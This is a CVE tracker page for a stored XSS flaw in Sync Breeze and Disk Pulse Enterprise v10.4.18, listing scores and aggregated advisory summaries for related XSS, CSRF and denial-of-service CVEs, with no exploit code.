CVE-2025-59899
published 2026-01-28CVE-2025-59899: Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18 contain a persistent authenticated Cross-Site Scripting (XSS) vulnerability. An…
PriorityP427medium5.4CVSS 3.1
AVNACLPRLUIRSCCLILAN
EPSS
0.17%
7.0th percentile
Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18 contain a persistent authenticated Cross-Site Scripting (XSS) vulnerability. An attacker could send malicious content to an authenticated user and steal information from their session due to insufficient validation of user input in '/server_options?sid=', affecting the 'tasks_logs_dir', 'errors_logs_dir', 'error_notifications_address', 'status_notifications_address', and 'status_reports_address' parameters.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| flexense | disk_pulse_enterprise | — | — |
| flexense | diskpulse | — | — |
| flexense | sync_breeze_enterprise_server | — | — |
| flexense | syncbreeze | — | — |
CVSS provenance
nvdv3.15.4MEDIUMCVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
nvdv4.05.1MEDIUMCVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No public exploits indexed.
Wiz
CVE-2025-59896 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2025-59896 [MEDIUM] CVE-2025-59896 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59896 :
VX Search vulnerability analysis and mitigation
Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18 contain a persistent authenticated Cross-Site Scripting (XSS) vulnerability. An attacker could send malicious content to an authenticated user and steal information from their session due to insufficient validation of user input in '/add_command?sid=', affecting the 'command_name' parameter.
Source : NVD
## 5.1
Score
Published January 28, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
VX Search
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:flexense:vx
Wiz
CVE-2025-59891 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
CVE-2025-59891 [HIGH] CVE-2025-59891 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59891 :
VX Search vulnerability analysis and mitigation
Cross-Site request forgery (CSRF) vulnerability in Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18. An authenticated user could cause another user to perform unwanted actions within the application they are logged into. This vulnerability is possible due to the lack of proper CSRF token implementation. Among other things, it is possible, using a POST request to change a user's password or create users via '/setup_login?sid=', affecting the 'username', 'password', and 'cpassword' parameters.
Source : NVD
## 8.5
Score
Published January 28, 2026
Severity HIGH
CNA Score 8.5
Affected Technologies
VX Search
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV
Wiz
CVE-2025-59899 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2025-59899 [MEDIUM] CVE-2025-59899 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59899 :
VX Search vulnerability analysis and mitigation
Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18 contain a persistent authenticated Cross-Site Scripting (XSS) vulnerability. An attacker could send malicious content to an authenticated user and steal information from their session due to insufficient validation of user input in '/server_options?sid=', affecting the 'tasks_logs_dir', 'errors_logs_dir', 'error_notifications_address', 'status_notifications_address', and 'status_reports_address' parameters.
Source : NVD
## 5.1
Score
Published January 28, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
VX Search
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probabil
Wiz
CVE-2025-59901 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2025-59901 [MEDIUM] CVE-2025-59901 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59901 :
VX Search vulnerability analysis and mitigation
Disk Pulse Enterprise v10.4.18 has an authenticated reflected XSS vulnerability in the '/monitor_directory?sid=' endpoint, caused by insufficient validation of the 'monitor_directory' parameter sent by POST. An attacker could exploit this weakness to send malicious content to an authenticated user and steal information from their session.
Source : NVD
## 8.5
Score
Published January 28, 2026
Severity HIGH
CNA Score 8.5
Affected Technologies
VX Search
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:flexense:vx_search
Sources
NVD
Windows
Wiz
CVE-2025-59900 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2025-59900 [MEDIUM] CVE-2025-59900 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59900 :
VX Search vulnerability analysis and mitigation
Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18 contain a persistent authenticated Cross-Site Scripting (XSS) vulnerability. An attacker could send malicious content to an authenticated user and steal information from their session due to insufficient validation of user input in '/server_options?sid=', affecting the 'tasks_logs_dir', 'errors_logs_dir', 'error_notifications_address', 'status_notifications_address', and 'status_reports_address' parameters.
Source : NVD
## 5.1
Score
Published January 28, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
VX Search
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probabil
Wiz
CVE-2025-59893 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
CVE-2025-59893 [HIGH] CVE-2025-59893 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59893 :
VX Search vulnerability analysis and mitigation
Cross-Site request forgery (CSRF) vulnerability in Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18. An authenticated user could cause another user to perform unwanted actions within the application they are logged into. This vulnerability is possible due to the lack of proper CSRF token implementation. Among other things, it is possible, using a POST request to rename commands via '/rename_command?sid=', affecting the 'command_name' parameter.
Source : NVD
## 8.5
Score
Published January 28, 2026
Severity HIGH
CNA Score 8.5
Affected Technologies
VX Search
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentil
Wiz
CVE-2025-59892 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
CVE-2025-59892 [HIGH] CVE-2025-59892 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59892 :
VX Search vulnerability analysis and mitigation
Cross-Site request forgery (CSRF) vulnerability in Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18. An authenticated user could cause another user to perform unwanted actions within the application they are logged into. This vulnerability is possible due to the lack of proper CSRF token implementation. Among other things, it is possible, using a POST request to delete commands individually via '/delete_command?sid=', using the 'cid' parameter.
Source : NVD
## 8.5
Score
Published January 28, 2026
Severity HIGH
CNA Score 8.5
Affected Technologies
VX Search
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentil
Wiz
CVE-2025-59895 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2025-59895 [HIGH] CVE-2025-59895 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59895 :
VX Search vulnerability analysis and mitigation
Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18 contain a remote denial-of-service (DoS) vulnerability in the configuration restore functionality. The issue is due to insufficient validation of user-supplied data during this process. An attacker could send malicious requests to alter the configuration file, causing the application to become unresponsive. In a successful scenario, the service may not recover on its own and require a complete reinstallation, as the configuration becomes corrupted and prevents the service from restarting, even manually.
Source : NVD
## 8.2
Score
Published January 28, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
VX Search
Has Public Exploit No
Wiz
CVE-2025-59894 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.5
CVE-2025-59894 [HIGH] CVE-2025-59894 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59894 :
VX Search vulnerability analysis and mitigation
Cross-Site request forgery (CSRF) vulnerability in Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18. An authenticated user could cause another user to perform unwanted actions within the application they are logged into. This vulnerability is possible due to the lack of proper CSRF token implementation. Among other things, it is possible, using a POST request to delete all commands via '/delete_all_commands?sid='.
Source : NVD
## 8.5
Score
Published January 28, 2026
Severity HIGH
CNA Score 8.5
Affected Technologies
VX Search
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 6.4
Exploitation Prob
Wiz
CVE-2025-59898 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2025-59898 [MEDIUM] CVE-2025-59898 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59898 :
VX Search vulnerability analysis and mitigation
Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18 contain a persistent authenticated Cross-Site Scripting (XSS) vulnerability. An attacker could send malicious content to an authenticated user and steal information from their session due to insufficient validation of user input in '/add_exclude_dir?sid=', affecting the 'exclude_dir' parameter.
Source : NVD
## 5.1
Score
Published January 28, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
VX Search
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:flexense
Wiz
CVE-2025-59897 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2025-59897 [MEDIUM] CVE-2025-59897 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59897 :
VX Search vulnerability analysis and mitigation
Sync Breeze Enterprise Server v10.4.18 and Disk Pulse Enterprise v10.4.18 contain a persistent authenticated Cross-Site Scripting (XSS) vulnerability. An attacker could send malicious content to an authenticated user and steal information from their session due to insufficient validation of user input in '/edit_command?sid=', affecting the 'source_dir' and ‘dest_dir’ parameters.
Source : NVD
## 5.1
Score
Published January 28, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
VX Search
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.
2026-01-28
Published